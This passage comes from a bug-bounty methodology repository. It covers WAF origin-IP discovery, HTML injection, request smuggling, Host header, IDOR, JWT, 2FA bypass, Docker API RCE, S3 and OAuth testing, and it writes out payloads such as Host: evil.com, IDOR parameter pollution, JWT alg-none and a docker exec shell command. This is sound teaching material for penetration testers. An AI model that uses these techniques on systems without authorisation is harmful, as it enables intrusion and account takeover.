 65 |   4. Collect all associated IPs
 66 | 
 67 | - **Shodan Method**:
 68 |   ```
 69 |   # Search by Common Name (CN)
 70 |   ssl.cert.subject.CN:"example.com"
 71 |   
 72 |   # Search in all certificate fields (broader)
 73 |   ssl:"example.com"
 74 |   ```
 75 | 
 76 |   **Note:** Verify results manually as they may include CDN/proxy IPs. SAN (Subject Alternative Name) fields are generally more reliable than CN.
 77 | 
 78 | ### 4. Direct IP Testing
 79 | 
 80 | For each potential IP, test if it responds to the target hostname:
 81 | 
 82 | ```bash
 83 | # Test single IP
 84 | curl -s -k -H "Host: example.com" https://POTENTIAL_IP/
 85 | 
 86 | # Test multiple IPs
 87 | for ip in $(cat potential_ips.txt); do
 88 |   org=$(curl -s https://ipinfo.io/$ip | jq -r '.org')
 89 |   title=$(timeout 2 curl -s -k -H "Host: example.com" https://$ip/ | pup 'title text{}')
 90 |   echo "IP: $ip | Title: $title | Org: $org"
 91 | done
 92 | ```
 93 | 
 94 | ### 5. Email Headers Analysis
 95 | 
 96 | Emails from the target domain often contain internal IP information:
 97 | 
 98 | 1. Trigger emails from the target (register, password reset, newsletters)
 99 | 2. Examine email headers, particularly:
100 |    - Return-Path
101 |    - Received
102 |    - X-Originating-IP
103 | 
104 | ### 6. Specialized Tools
105 | 
106 | Several tools automate origin IP discovery:
107 | 
108 | - **CloudFail**:
109 |   ```bash
110 |   git clone https://github.com/m0rtem/CloudFail.git
111 |   cd CloudFail
112 |   pip install -r requirements.txt
113 |   python3 cloudfail.py -t example.com
114 |   ```
115 | 
116 | - **CloudFlair**:
117 |   ```bash
118 |   git clone https://github.com/christophetd/CloudFlair
119 |   cd CloudFlair
120 |   pip install -r requirements.txt
121 |   python3 cloudflair.py example.com
122 |   ```
123 | 
124 | ## Verifying the Origin IP
125 | 
126 | After discovering potential origin IPs, verify them:
127 | 
128 | 1. Compare response content with the WAF-protected site
129 | 2. Look for server fingerprints (headers, error pages)
130 | 3. Check for administrative interfaces or panels not accessible via WAF
131 | 
132 | ## Best Practices
133 | 
134 | - Combine multiple techniques for better results
135 | - Document all discovered IPs and their verification status
136 | - Check IP ranges belonging to the organization
137 | - Consider timing your requests to avoid rate limiting
138 | 
139 | ## References
140 | 
141 | - [Navisec: A Pentester's Guide - Unmasking WAFs and Finding the Source](https://delta.navisec.io/a-pentesters-guide-part-5-unmasking-wafs-and-finding-the-source/)
142 | - [Detectify: Bypassing Cloudflare WAF with the Origin Server IP Address](https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/)
143 | 
144 | ## Credits
145 | 
146 | ### Original Author
147 | * [maverickNerd](https://x.com/maverickNerd)
148 | 
149 | ### Contributors
150 | * [nagarajcruze](https://github.com/nagarajcruze)
151 | * [www](https://github.com/www)
152 | 
153 | ---
154 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
155 | 


--------------------------------------------------------------------------------
/GraphQL/GraphQL.md:
--------------------------------------------------------------------------------
 1 | ## Videos
 2 | - GraphQL Video - [InsiderPhd](https://www.youtube.com/watch?v=GlvNwhq-uBg)
 3 | - [REST in Peace: Abusing GraphQL to Attack Underlying Infrastructure - LevelUp 0x05](https://www.youtube.com/watch?v=NPDp7GHmMa0)
 4 | 
 5 | ## Blogs
 6 | - Exploit GraphQL - [Yeswehack Blog](https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/)
 7 | - Hacking GraphQL - [Part 1](https://infosecwriteups.com/hacking-graphql-for-fun-and-profit-part-1-understanding-graphql-basics-72bb3dd22efa) [Part 2](https://infosecwriteups.com/hacking-graphql-for-fun-and-profit-part-2-methodology-and-examples-5992093bcc24)
 8 | - [That single GraphQL issue that you keep missing](https://blog.doyensec.com/2021/05/20/graphql-csrf.html) by [Doyensec](https://www.doyensec.com/)
 9 | - [Reverse engineer a GraphQL API](https://swizec.com/blog/reverse-engineer-a-graphql-api-to-automate-love-notes-codewithswiz-24)
10 | - [Exploiting GraphQL](https://blog.assetnote.io/2021/08/29/exploiting-graphql/) by [Assetnote](https://assetnote.io/)
11 | - [GraphQL Resources Thread](https://twitter.com/holybugx/status/1441460070387261440?s=21) by [HolyBugx](https://twitter.com/HolyBugx)
12 | - [GraphQL Test Cases](https://anmolksachan.github.io/graphql/)
13 | 
14 | # Tools
15 | - [GraphQL Voyager](https://apis.guru/graphql-voyager/)
16 | - [GraphQL Cheatsheet](https://devhints.io/graphql)
17 | - [AutoGraphQL](https://graphql-dashboard.herokuapp.com/) -  Demo [Video ](https://www.youtube.com/watch?v=JJmufWfVvyU)
18 | - [graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility to learn more about what technology is behind a given GraphQL endpoint
19 | - [InQL - Introspection GraphQL Scanner](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f) - A security testing tool to facilitate GraphQL technology security auditing efforts
20 | - [Graphicator is a GraphQL "scraper" / extractor](https://github.com/cybervelia/graphicator)
21 | 
22 | # Labs
23 | - Damn-Vulnerable-GraphQL-Application - [Github](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application)
24 | 


--------------------------------------------------------------------------------
/HTML_Injection/HTML_Injection_on_password_reset_page.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Summary
 3 | Password reset links are usually addressed to your account name followed by the reset link. Also if the application allows
 4 | you to have your account name with tags and special characters then you should try this.
 5 | 
 6 | ### Steps
 7 | 
 8 | 1. Create your account
 9 | 2. Edit your name to `<h1>attacker</h1>` or `"abc><h1>attacker</h1>` and save it.
10 | 3. Request for a reset password and check your email.
11 | 4. You will notice the `<h1>` tag getting executed
12 | 
13 | * HTML injection are usually considered as low to medium severity bugs but you can escalate the severity by serving a 
14 | malicious link by using `<a href>` for eg: `<h1>attacker</h1><a href="your-controlled-domain"Click here</a>`
15 | 
16 | * You can redirect the user to your malicious domain and serve a fake reset password page to steal credentials 
17 | Also you can serve a previously found XSS page and steal user cookies etc etc.. The creativity lies on you..
18 | 
19 | ## Author
20 | [@C1pher15](https://twitter.com/C1pher15)
21 | 


--------------------------------------------------------------------------------
/HTTP_Desync/http_desync.md:
--------------------------------------------------------------------------------
 1 | # HTTP Desync or Request Smuggling:
 2 | - Basics:
 3 | "HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users. " -Portswigger  
 4 | 
 5 | 
 6 |  ## Where ?:  
 7 | 
 8 |  - Any Endpoint might be Vulnerable to HTTP Desync attack.  
 9 |  
10 |  - You can Find the Vulnerability on Non-endpoints as well, But impact is always much higher on Sensitive Endpoints ;)
11 |  ---
12 |  ### Step 1:  
13 | 
14 |  * Go To Repeater tab, and try various Timing based payloads to confirm the bug. More Explaination here:  
15 | 
16 | [Finding the Vulnerability](https://portswigger.net/web-security/request-smuggling/finding)
17 | 
18 | ### Step 2:  
19 | 
20 | * Once you have successfully discovored the bug, you can chain it with various bugs eg. Account Takeover by stealing session IDs, Cross side Scripting Attacks in User-Agent Header,etc. More Description here:  
21 | 
22 | [Exploiting the Vulnerability](https://portswigger.net/web-security/request-smuggling/exploiting)  
23 | 
24 | ---
25 | ## Tools:  
26 | 
27 | 1. [defparam`s_smuggler.py](https://github.com/defparam/smuggler)  
28 | 
29 | `Usage:`  
30 | * Smuggler.py :
31 | 
32 |     `cat alive_urls.txt | python3 smuggler.py -m GET/POST #either GET or POST ` 
33 |     
34 |     OR
35 |     
36 |     ` python3 smuggler.py -u https://example.com -m GET/POST  `
37 |     
38 | 2. [Burp_smuggler](https://github.com/PortSwigger/http-request-smuggler) (also available in BApp store)  
39 | 
40 | ## More Info:  
41 | 
42 | ### Topics  
43 | 
44 | https://paper.seebug.org/1049/ (Recommended !)  
45 | 
46 | [Portswigger Topic](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)  
47 | 
48 | [Portswigger Lab](https://portswigger.net/web-security/request-smuggling)  
49 | 
50 | ### Reports (Hackerone):  
51 | 
52 | [Report 1](https://hackerone.com/reports/737140)  
53 | 
54 | [Report 2](https://hackerone.com/reports/867952)  
55 | 
56 | [Report 3](https://hackerone.com/reports/498052)  
57 | 
58 | [Report 4](https://hackerone.com/reports/526880)
59 | 
60 | [Report 5](https://hackerone.com/reports/771666)  
61 | 
62 | [Report 6](https://hackerone.com/reports/753939)  
63 | 
64 | [Report 7](https://hackerone.com/reports/648434 )  
65 | 
66 | [Report 8](https://hackerone.com/reports/740037)  
67 | 
68 | ## Writeups (Medium.com):  
69 | 
70 | [Article 1](https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142)  
71 | 
72 | [Article 2](https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4)  
73 | 
74 | [Article 3](https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d)  
75 | 
76 | [Article 4](https://medium.com/bugbountywriteup/crossing-the-borders-the-illegal-trade-of-http-requests-57da188520ca)  
77 | 
78 | ## Extra:  
79 | 
80 | [A Brief Video About Req. Smuggling](https://youtu.be/gzM4wWA7RFo)
81 | 
82 | ### Author:
83 | [Neutron__](https://twitter.com/Neutron__)
84 | ###### If you think something was missed, feel free to add/modify/delete it :)
85 | 


--------------------------------------------------------------------------------
/Host-Header/Host-Header.md:
--------------------------------------------------------------------------------
 1 | # Summary For Host Header
 2 | ![https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small](https://pbs.twimg.com/media/ET39wJOWoAAfTBb?format=jpg&name=small)
 3 | 
 4 | # Also Check This Things While Testing
 5 | 1. Add two `HOST:` in Request.
 6 | 2. Try this Headers
 7 |     ```      
 8 |        X-Original-Url:
 9 |        X-Forwarded-Server:
10 |        X-Host:
11 |        X-Forwarded-**Host**:
12 |        X-Rewrite-Url:
13 |     ```
14 | 3. If you come across `/api.json` in any AEM instance during bug hunting, try for web cache poisoning via following  
15 |   `Host: , X-Forwarded-Server , X-Forwarded-Host:`
16 |    and or simply try https://localhost/api.json HTTP/1.1
17 | 4. Also try `Host: redacted.com.evil.com`
18 | 5. Try Host: evil.com/redacted.com
19 | [https://hackerone.com/reports/317476](https://hackerone.com/reports/317476)
20 | 6. Try this too `Host: example.com?.mavenlink.com`
21 | 7. Try `Host: javascript:alert(1);` Xss payload might result in debugging mode.
22 | [https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html](https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
23 | 8. Host Header to Sqli
24 | [https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610](https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610)
25 | 9. Bypass front server restrictions and access to forbidden files and directories through `X-Rewrite-Url/X-original-url:` 
26 |    `curl -i -s -k -X 'GET' -H 'Host: <site>' -H 'X-rewrite-url: admin/login' 'https://<site>/'.`
27 | 
28 | 
29 | ## Author:
30 | * [@KathanP19](https://twitter.com/KathanP19)
31 | 


--------------------------------------------------------------------------------
/IDOR/IDOR-Old.md:
--------------------------------------------------------------------------------
  1 | ## Testing for IDOR/Broken object level authorization:
  2 | 
  3 | Difficulty: Easy 
  4 | 
  5 | Tips: Don't blindly test for changing numbers till you get PII, tools can do this for you
  6 | 
  7 | **Finding IDOR Attack Vectors Ideas:**
  8 | 
  9 | 1. What  do they use for authorization?(JWT, API Keys, cookies, tokens) Tip: Find this out by replacing high privaledge authorization with lower privaledge authorization and seeing what the server responds with
 10 | 2. Understand how they use ID's, hashes, and their API. Do this by looking at the API Documentations if they have one.
 11 | 
 12 | ***Every time you see a new API endpoint that receives an object ID from the client, ask yourself the following questions:***
 13 | 
 14 | - Does the ID belong to a private resource? (e.g /api/user/123/news vs  /api/user/123/transaction)
 15 | - What are the IDs that belong to me?
 16 | - What are the different possible roles in the API?(For example — user, driver, supervisor, manager)
 17 | 
 18 | ## Bypassing Object Level Authorization:
 19 | 
 20 | - Add parameters onto the endpoints for example, if there was
 21 | 
 22 | ```html
 23 | GET /api_v1/messages --> 401
 24 | vs 
 25 | GET /api_v1/messages?user_id=victim_uuid --> 200
 26 | ```
 27 | 
 28 | - HTTP Parameter pollution
 29 | 
 30 | ```html
 31 | GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
 32 | GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK
 33 | 
 34 | GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
 35 | ```
 36 | 
 37 | - Add .json to the endpoint, if it is built in Ruby!
 38 | 
 39 | ```html
 40 | /user_data/2341 --> 401 Unauthorized
 41 | /user_data/2341.json --> 200 OK
 42 | ```
 43 | 
 44 | - Test on outdated API Versions
 45 | 
 46 | ```html
 47 | /v3/users_data/1234 --> 403 Forbidden
 48 | /v1/users_data/1234 --> 200 OK
 49 | ```
 50 | 
 51 | * Wrap the ID with an array.
 52 | 
 53 | ```html
 54 | {“id”:111} --> 401 Unauthriozied
 55 | {“id”:[111]} --> 200 OK
 56 | ```
 57 | 
 58 | * Wrap the ID with a JSON object:
 59 | 
 60 | ```html
 61 | {“id”:111} --> 401 Unauthriozied
 62 | 
 63 | {“id”:{“id”:111}} --> 200 OK
 64 | ```
 65 | 
 66 | * JSON Parameter Pollution:
 67 | 
 68 | ```html
 69 | POST /api/get_profile
 70 | Content-Type: application/json
 71 | {“user_id”:<legit_id>,”user_id”:<victim’s_id>}
 72 | ```
 73 | 
 74 | - Try to send a wildcard(*) instead of an ID. It’s rare, but sometimes it works.
 75 | - If it is a number id, be sure to test through a large amount of numbers, instead of just guessing
 76 | - If endpoint has a name like /api/users/myinfo, check for /api/admins/myinfo
 77 | - Replace request method with GET/POST/PUT
 78 | - Use burp extension autorize
 79 | - If none of these work, get creative and ask around!
 80 | 
 81 | ## Escalating/Chaining with IDOR's Ideas:
 82 | 
 83 | 1.  Lets say you find a low impact IDOR, like changing someone elses name, chain that with XSS and you have stored XSS!
 84 | 2. If you find IDOR on and endpoint, but it requires UUID, chain with info disclosure endpoints that leak UUID, and bypass this!
 85 | 3. If none of these work, get creative and ask around!
 86 | 
 87 | ### Reference
 88 | [https://twitter.com/swaysThinking/status/1301663848223715328](https://twitter.com/swaysThinking/status/1301663848223715328)
 89 | 
 90 | ### Reports (Hackerone)
 91 | 
 92 | #### Resolved
 93 | 
 94 | - [IDOR to delete images from other stores](https://hackerone.com/reports/404797)
 95 | - [IDOR in changing shared file name](https://hackerone.com/reports/547663)
 96 | - [User uploaded portfolio files can be accessed by any user even after deleted](https://hackerone.com/reports/300179)
 97 | - [IDOR and statistics leakage in Orders](https://hackerone.com/reports/544329)
 98 | - [I.D.O.R To Order,Book,Buy,reserve On YELP FOR FREE (UNAUTHORIZED USE OF OTHER USER'S CREDIT CARD)](https://hackerone.com/reports/391092)
 99 | - [IDOR allow access to payments data of any user](https://hackerone.com/reports/751577)
100 | - [IDOR allow to extract all registered email](https://hackerone.com/reports/302485)
101 | - [IDOR at https://account.mackeeper.com/at/load-reports/profile/<profile_id> leaks information about devices/licenses](https://hackerone.com/reports/783117)
102 | - [IDOR bug to See hidden slowvote of any user even when you dont have access right](https://hackerone.com/reports/661978)
103 | - [IDOR on update user preferences](https://hackerone.com/reports/854290)
104 | - [idor on upload profile functionality](https://hackerone.com/reports/741683)
105 | - [IDOR to view User Order Information](https://hackerone.com/reports/287789)
106 | - [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907)
107 | - [Replace other user files in Inbox messages](https://hackerone.com/reports/322661)
108 | 
109 | ### Author
110 | 
111 | * [@harsha0x01](https://twitter.com/harsha0x01)
112 | * [@klaus](https://twitter.com/klaus_dev)
113 | 


--------------------------------------------------------------------------------
/JIRA/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Blogs
 3 | - Jira vulnerabilities and how they are exploited in the wild - [thehackerish Blog](https://thehackerish.com/jira-vulnerabilities-and-how-they-are-exploited-in-the-wild/)
 4 | 
 5 | 
 6 | # Tools
 7 | - [Jira-Lens](https://github.com/MayankPandey01/Jira-Lens) [Jira-Lens 🔍 is a Python Based vulnerability Scanner for JIRA.This tool Performs 25+ Checks including CVE's and Multiple Disclosures on the Provided JIRA Instance]
 8 | 
 9 | 
10 | # Author
11 | **Name:** Mayank Pandey
12 | 
13 | **Handle:** [@mayank_pandey01](https://twitter.com/mayank_pandey01)
14 | 
15 | 


--------------------------------------------------------------------------------
/JWT/OLD_JWT_ATTACK_Notes.md:
--------------------------------------------------------------------------------
  1 | # JWT Attack
  2 | 
  3 | ### FIRST IF YOU DON'T KNOW WHAT IS JWT YOU MUST READ AND WATCH BELOW RESOURCES
  4 | -----------------------------------------------------------------------
  5 | * https://twitter.com/BHinfoSecurity/status/1299743624553549825?s=09
  6 | * https://youtu.be/ghfmx4pr1Qg ( very begginer friendly)
  7 | * https://medium.com/ag-grid/a-plain-english-introduction-to-json-web-tokens-jwt-what-it-is-and-what-it-isnt-8076ca679843
  8 | * https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a
  9 | * https://anubhav-singh.medium.com/get-a-feel-of-jwt-json-web-token-8ee9c16ce5ce
 10 | * https://anubhav-singh.medium.com/attacks-on-json-web-token-jwt-278a49a1ad2e
 11 | * Cheat Sheet - [Pentester's Lab](https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf)
 12 |  
 13 | ### NOTES FOR ATTACKING JWT
 14 | * What the heck is this ?!
 15 | ```
 16 | 1. It is an authentication type 
 17 | 2. It consists of header,payload,Signature
 18 | ```
 19 | ---------------------------------------------------------------------------------
 20 | * Header 	
 21 | ```
 22 | {
 23 |  "alg" : "HS256",
 24 |  "typ" : "JWT"
 25 | }
 26 | ```
 27 | -------------------------------------------------------------------
 28 | * Payload 	
 29 | ```
 30 | {
 31 |  "loggedInAs" : "admin",
 32 |  "iat" : 1422779638
 33 | }
 34 | ```
 35 | -----------------------------------------------------------------------------
 36 | * Signature 	
 37 | ```
 38 | HMAC-SHA256
 39 | (
 40 |  secret,
 41 |  base64urlEncoding(header) + '.' +
 42 |  base64urlEncoding(payload)
 43 | )
 44 | ```
 45 | -----------------------------------------------
 46 | * Changing alg to null 
 47 | * Example
 48 | ```
 49 | {
 50 |  "alg" : "NONE",
 51 |  "typ" : "JWT"
 52 | }
 53 | Note;;////--remove the signuature
 54 | You can also use none,nOne,None,n0Ne
 55 | ```
 56 | -------------
 57 | * Change the payload like 
 58 | ```
 59 | Payload 	
 60 | 
 61 | {
 62 |  "loggedInAs" : "admin", 
 63 |  "iat" : 1422779638
 64 | }
 65 | ```
 66 | * Here change user to admin
 67 | ----------------------------------------------------
 68 |  # SOME MORE TIPS AND METHOD
 69 |  --------------------------------------------------------
 70 |  1. First decode full token or 1 1 each part of token to base64
 71 |  2. Change the payload use jwt web token burp
 72 |  3. Changing encrption  RS256 to HS256
 73 |  4. Signature not changes remove it or temper it,
 74 |  5. Brute forcing the key in hs256 because it use same key to sign and verify means publickey=private key
 75 |  ---------------------------------------------------------------------------------------------------
 76 |  ### Other Easy Method
 77 | ```
 78 | 1) Create a account
 79 | 2) Inspect the token
 80 | 3) Base64 decode the header
 81 | 4) If any Kid= parameter are there so you can find some bugs
 82 | 5) Using that parameter you can also find directory traversal , i tell you how
 83 | 6) Change that kid= parameter with you directory traversal payload
 84 | 7) Change payload {"user":"admin"}
 85 | 8) Create a python script that generate a exploit token. (If you want that script so dm me in Twitter )
 86 | 9) Put that token and reload the page
 87 | 10) Done
 88 | ```
 89 | ---
 90 |  # TOOLS TO USE
 91 |  -----------------------------------------------------------------------------------------------
 92 |  * [Jwt token attack burp extention](https://github.com/portswigger/json-web-token-attacker)
 93 |  * Base64 decoder
 94 |  * jwt.io to analyse the struct of token
 95 |  * jwt cat for weak secret token [jwtcat](https://github.com/aress31/jwtcat) 
 96 |  * Tool is used for validating, forging, scanning and tampering JWTs [jwt_tool](https://github.com/ticarpi/jwt_tool)
 97 |  * Tool to test security of JSON Web Tokens [jwtXploiter](https://github.com/DontPanicO/jwtXploiter)
 98 | 
 99 | ---------------------------------------------------------------------------------------------------------------------------
100 | ### SOURCES: 
101 | - Intresting blog - [Medium](https://barrymalone.medium.com/json-web-tokens-beginner-exploitation-5a44f8f6efff)
102 | * Youtube,Medium,Github,Google
103 | ### Author
104 | * [Naman Shah](https://twitter.com/naman_1910)
105 | * [@kAshhadali10](https://twitter.com/kAshhadali10)
106 | * [@0xrtt](https://twitter.com/0xrtt)
107 | * [Anubhav Singh](https://twitter.com/AnubhavSingh_)
108 | 


--------------------------------------------------------------------------------
/MFA_Bypasses/2FA_Bypass.md:
--------------------------------------------------------------------------------
 1 | # 2FA Bypass
 2 | 
 3 | * 1:- Password Reset Disable 2FA	
 4 | * 2:- No Rate limit
 5 | * 3:- Sending all alphabets instead of number
 6 | * 4:- Status Code Manipulation
 7 | * 5:- 2FA bypass by substituting part of the request from the session of another account. 
 8 |     ```
 9 |     If a parameter with a specific value is sent to verify the code in the request, try sending the value from the request of another account.
10 |     
11 |     For example, when sending an OTP code, the form ID/user ID or cookie is checked, which is associated with sending the code. If we apply the data from the parameters of the account on which you want to bypass code verification (Account 1) to a session of a completely different account (Account 2), receive the code and enter it on the second account, then we can bypass the protection on the first account. After reloading the page, 2FA should disappear.
12 |     ```
13 |  * 6:- Bypass 2FA using the “memorization” functionality.
14 | 		
15 |     `Many sites that support 2FA, have a “remember me” functionality. It is useful when the user doesn’t want to enter a 2FA code on subsequent login windows. And it is important to identify the way in which 2FA is “remembered”. This can be a cookie, a value in session/local storage, or simply attaching 2FA to an IP address.`
16 |  * 7:- OTP Leakage in Response
17 |  * 8:- Bypassing 2fa Via OAuth mechanism ( Mostly not Applicable one )
18 | 		
19 |     `Site.com requests Facebook for OAuth token > Facebook verifies user account > Facebook send callback code > Site.com logs a user in (Rare case)`
20 |  * 9:- Bypassing 2fa using response manipulation
21 |    ```
22 |    Enter correct OTP -> Intercept & capture the response -> logout -> enter wrong OTP -> Intercept & change the response with successful previous response -> logged in
23 |    ```
24 |  * 10:- CSRF on 2FA Disable Feature.
25 |     ```
26 |     Signup for two account -> Login into attacker account & capture the disable 2FA request -> generate CSRF POC with .HTML extension -> Login into victim account and fire the request — — -> It disable 2FA which leads to 2FA Bypass.
27 |     ```
28 |  * 11:- Bypass 2FA by Adding null or 000000
29 |  * 12:- Bypass 2FA by Batch API request
30 |     ```
31 |     Suppose if 2FA parameter like "code" of "OTP" is going with the request, add same parameter into the request multiple times like BATCH Mode for REST APi.
32 |     ```
33 | 
34 | * https://twitter.com/FaniMalikHack/status/1395042756108505092
35 | * https://twitter.com/FaniMalikHack/status/1402627994833805313
36 | 
37 | ## Twitte :- [Fani Malik](https://twitter.com/FaniMalikHack)
38 | 


--------------------------------------------------------------------------------
/MFA_Bypasses/README.md:
--------------------------------------------------------------------------------
 1 | # Some MindMaps
 2 | ---
 3 | ### 2FA Bypass by Hack3rScr0lls
 4 | ![https://pbs.twimg.com/media/EW8vBWEX0AAxcVj?format=jpg&name=small](https://pbs.twimg.com/media/EW8vBWEX0AAxcVj?format=jpg&name=small)
 5 | 
 6 | ### Source
 7 | * [https://twitter.com/hackerscrolls/status/1256276376019230720](https://twitter.com/hackerscrolls/status/1256276376019230720)
 8 | 
 9 | ### 2FA Bypass by Harshbothra 
10 | * [MindMap](https://www.mindmeister.com/1736437018?t=SEeZOmvt01)
11 | 
12 | ### Author
13 | * [KathanP19](https://twitter.com/KathanP19)
14 | 


--------------------------------------------------------------------------------
/Misconfigurations/Default_Credential_And_Admin_Panel.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Default Credentials Basics
 3 | 
 4 | - Default Software Configurations for admin console of webapp
 5 | ```
 6 | https://www.target.com/admin
 7 | https://www.target.com/admin-console
 8 | https://www.target.com/console
 9 | https://admin.target.com
10 | https://admin-console.target.com
11 | https://console.target.com
12 | ```
13 | 
14 | ## 1. Getting access through third party services
15 | 
16 | * When the admin console login page is working on a third party service,then just search for it's default credentials on Google
17 | * Third Party service URL are of the format: https://target.<TPS Name>.com/login
18 | * Some examples are Okta,WP etc
19 | 
20 | ## 2. Bypass to get access to login page
21 | ```
22 | 1. This bypass is used when you are forbidden to get access to admin login page
23 | 2. We use Header Injection for this bypass
24 | 3. `X-Orginal-URL: /admin` or `X-Rewrite-URL:/admin`
25 | 4. Use this Header under Host
26 | 
27 | * Use Burp to capture then check
28 | ```
29 | ## Hackerone Reports :
30 | - https://hackerone.com/reports/192074
31 | - https://hackerone.com/reports/174883
32 | - https://hackerone.com/reports/398797
33 | 
34 | ## Reference : 
35 | https://www.owasp.org/index.php/Testing_for_default_credentials_(OTG-AUTHN-002)
36 | https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_(OWASP-AT-003)
37 | 
38 | ## Author:
39 | * [@e11i0t_4lders0n](https://twitter.com/e11i0t_4lders0n)
40 | 


--------------------------------------------------------------------------------
/Misconfigurations/Docker.md:
--------------------------------------------------------------------------------
 1 | # Docker API unauthorized RCE
 2 | - Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications.
 3 | the docker daemon (dockerd) provides an API service used for remote control of docker service the default daemon listen on Unix /var/run/docker.sock and when bound to a public interface can be used by an attacker to compromise container system due to lack of default authentication
 4 | 
 5 | ## Background concept:
 6 | 
 7 | - The host is running docker: daemon bound to the external interface with no access control or authentication
 8 | - Attacker uses docker API function to enumerate manage and control the container service the attacker is able to control existing deployed container or create another one.
 9 | - Docker API provides JSON response containing the output of command issued.
10 | - Enumerating docker API services
11 | - By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, docker host APIs can be accessed over the public internet.
12 | 
13 | ```
14 | nmap IP:2375/2376
15 | nmap -p- IP
16 | nmap -Pn -p 2375 IP
17 | nmap -sV -p 2375 IP
18 | ```
19 | - To confirm that the docker is service is running on the target we can give the string in the browser and check the response
20 | ex: `https://IP:2375`
21 | - we will receive a response something like this
22 | `{"message":"page not found"}`
23 | - and to confirm the version details we can use this
24 | `https://IP:2375/version`
25 | 
26 | - The command used to exploit
27 | 
28 | - This command is used to get all the information about the docker container
29 | `docker -H IP:2375 info`
30 | 
31 | - List all the running containers
32 | `docker -H IP:2375 ps`
33 | 
34 | - List all the stopped containers
35 | `docker -H IP:2375 ps -a`
36 | 
37 | - Docker command for RCE
38 | `docker -H IP:2375 exec -it container_name /bin/bash`
39 | 
40 | ## Contributor:
41 | - [N3T_hunt3r](https://twitter.com/N3T_hunt3r)
42 | 


--------------------------------------------------------------------------------
/Misconfigurations/S3-Bucket_Misconfig.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ##  How to check for amazon S3 Bucket Misconfiguration.
 3 | * First of all, you need to install aws cli - `Pip install awscli`
 4 | * Dont Forget to Set:
 5 | \- Access key 
 6 | \- Secret key
 7 | 
 8 | **1.** **Check is you can list iteams from the bucket.** 
 9 | `aws s3 ls s3://<bucket name>`
10 | * See if you are able to access that bucket.
11 | * If the bucket is not accessible, still we can try to exploit it.
12 | 
13 | * If you are getting some errors then run this command 
14 | `aws s3 ls s3://<bucket name> --no-sign-request`
15 | 
16 | **2. Try moving the files or deleting it and see if you are able to do that or not** 
17 | * If it is possible to move files then it is vulnerable and you can report it otherwise it is not vulnerable
18 | * First Make a file 
19 | `echo "Testing purpose" >> test.txt `
20 | * Now try command to move the file into the bucket. 
21 | `aws s3 mv test.txt s3://<bucket name>`
22 | * Also try command to copy the file from local drive to the S3 bucket. 
23 | `aws s3 cp test.txt s3://[bucketname]/test.txt`
24 | 
25 | **3.  Delete files from the bucket.**
26 | * Command to delete the file into the bucket
27 | `aws s3 rm test.txt s3://<bucket name>/test.txt` *(if that is present)*
28 | 
29 | 
30 | ## References :
31 |  * [Hackerone Report](https://hackerone.com/reports/700051) 
32 |  * [Hackerone Report](https://hackerone.com/reports/229690) 
33 |  * [https://bugbountypoc.com/s3-bucket-misconfiguration-from-basics-to-pawn](https://bugbountypoc.com/s3-bucket-misconfiguration-from-basics-to-pawn)
34 |  
35 | ## Author :
36 |  * [Anishka Shukla](https://twitter.com/AnishkaShukla)
37 |  * [Anubhav Singh](https://twitter.com/AnubhavSingh_)
38 | 


--------------------------------------------------------------------------------
/OAuth/OAuth 2.0 Hunting Methodology.md:
--------------------------------------------------------------------------------
  1 | ## OAuth 2.0 Hunting Methodology
  2 | In OAuth there are 2 types of flows/grant types:
  3 | - Authorization code flow
  4 | - Implicit flow
  5 | 
  6 | Note: *if the oauth service uses authorization code flow then there is little to no chance of finding a bug but if the oauth service uses implicit flow then there is a good chance of finding bugs*
  7 | 
  8 | ## How to differentiate between implicit and authorization code grant type
  9 | 
 10 | ### <ins>Authorization code grant type</ins>
 11 | 
 12 | **Authorization request**
 13 | - When you send an authorization request to the oauth service in the client application , The client application sends a request to the OAuth service's `/authorization` endpoint asking for permission to access specific user data.
 14 | 
 15 | > Note: the endpoint name can be different according to the application like `/auth` etc. but you can identify them based on the parameters used.
 16 | 
 17 | - The request in authorization code flow looks like:
 18 | 
 19 | ```
 20 | GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 
 21 | Host: oauth-authorization-server.com
 22 | ```
 23 | 
 24 | - So, in authorization code grant type the `response_type` parameter should be `code` . this code is used to request access token from the oauth service.
 25 | 
